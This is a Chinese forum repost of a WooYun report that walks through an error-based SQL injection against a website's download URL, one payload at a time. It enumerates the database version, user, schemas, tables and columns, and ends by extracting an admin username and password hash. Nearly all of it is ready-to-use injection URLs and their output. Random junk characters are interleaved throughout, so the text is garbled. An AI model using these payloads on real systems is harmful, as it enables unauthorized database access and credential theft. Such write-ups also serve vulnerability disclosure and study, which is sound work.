http://www.wooyun.org/bugs/wooyun-2010-01666
$ N+ f! E% v, p* V4 M8 E# j0 V( N9 s6 @, n
之前想找个测试目标，没想到这里就有一个，可以测试一下，做个记录而已。
" e! L: k# Z- X: |% e6 s8 q) K3 b8 m
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
# `$ [- G. M% a& C# u; L. \* g+ K3 U/ c* i' R! W v* i: s: h2 l
/data0/htdocs/leqi_new/app/myapp.php
5 Z6 s7 f3 c* M, w: p
) E. g# ^! k1 f5 H- R 或者
! o- z$ L! L @0 a" e# E, e6 J
" o% G$ W8 t/ c9 C4 g. X& L# o/**********version()**********/ 5.1.49-log
6 y3 P9 {* V% g! B+ B3 {http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/ ~; P E$ O4 ~9 {+ v: ~/ p5 t1 R: z% V5 G8 V$ m/ |6 X( f
/**********user()**********/
0 m8 T+ y) V( Y9 N# B* _http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0032 U* z$ @3 z/ z* x( t
2 R1 B/ r" q1 h/ K3 \
/**********database()**********/ leqi2 L6 ?% u3 g9 c2 _6 U' }/ g1 v
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
& L* o7 H' X$ b$ V) I E7 Y1 _4 l
/**********limit依次递归爆库**********/
0 E1 c9 i! w( \' g! I0 V! Thttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
9 ~# e( M, E2 j" ?: einformation_schema3 {, u$ T' w- f: A. `& G5 i
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0033 Z, F5 y% b) w: t3 `. \; h
leqi
: f2 N! x$ z. v. b/ u* o$ `! A) L2 X7 Dhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003! H0 M* Y) p) T0 F
test! u" d8 A8 H' J5 |* M
6 i9 ^& f! [% |( f& l9 Y- A
/**********limit依次递归爆表名**********/
7 m' V4 j9 {* s4 xhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
) e+ @8 Q/ _0 q/ d/ V; Jusers
+ k. @% y) m6 V5 D2 r% F# A" U
+ _ _# i( c& I( u5 r2 v/**********limit依次递归爆字段名**********/
4 S) Z9 _) z3 z9 n; Rhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003 z& k0 N3 M4 p/ b1 S1 J2 y
user_id,username,nickname,passwd,group_id) l- K6 ^6 _" E0 L& n
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23, d/ ?* i( b0 A
/wapc/5000_0005_003
4 X S& U5 F: M4 \( E11 21
3 v& c" p- V/ |: ]% q( ihttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
, g/ E7 L: v4 t- x& L/wapc/5000_0005_003& u- S4 F: A: Y
11 341 351 361
2 l7 r% i3 q! W% Q0 J5 \; d/**********爆数据**********/
* F- S. k4 V& U$ z) h H1 nhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%231 \* p! {3 v% M+ A( t
admin
# Z* G: c% e! b4 j" Zhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
1 u& j; V) ]1 Q1 s$ ]% H/ E6a8b4574ca231eb8bd52764d4978ffcd8 Z, s* W% ]( }5 s1 y
3 \8 {8 F: T! Z! z3 [- p: P+ o
5 g" N+ }% A, i6 ~
|